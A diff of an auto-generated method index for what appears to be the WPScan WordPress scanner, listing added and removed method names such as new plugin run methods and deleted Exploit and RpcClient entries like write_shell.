RpcClient + #readme_url — WpItem #readme_url — WpReadme - #readme_url — WpItem - #red — Object #redirection — WebSite + #register — Plugins + + #register_options — Plugin + + #register_plugin — Plugins + #registration_enabled? — WpTarget #registration_url — WpTarget @@ -529,28 +529,30 @@ #require_files_from_directory — Object + #reset_head — GitUpdater + + #results — CustomOptionParser + #rss_url — WebSite - #save — Generate_List + #run — ListGeneratorPlugin + + #run — CheckerPlugin + + #run — Plugin + + #save — GenerateList #search_replace_db_2_exists? — WpTarget #search_replace_db_2_url — WpTarget - #session_count — Exploit - - #sessions — RpcClient - - #sessions — Exploit - - #set_file_name — Generate_List + #set_file_name — GenerateList #set_option_from_cli — WpscanOptions #simple_login_lockdown_url — WpLoginProtection - #start — Exploit - #targets_url_from_theme — WpTimthumbs #theme — WpTarget @@ -567,12 +569,12 @@ #to_s — WpItem - #update — SvnUpdater - #update — Updater #update — GitUpdater + #update — SvnUpdater + #url — WpTarget #url= — WpscanOptions @@ -597,6 +599,8 @@ #wp_content_dir — WpTarget + #wp_org_item? — WpItem + #wp_org_url — WpItem #wp_plugins_dir — WpTarget @@ -605,10 +609,6 @@ #write_entry — CacheFileStore - #write_shell — RpcClient - - #write_shell — Exploit - #xml_rpc_url — WebSite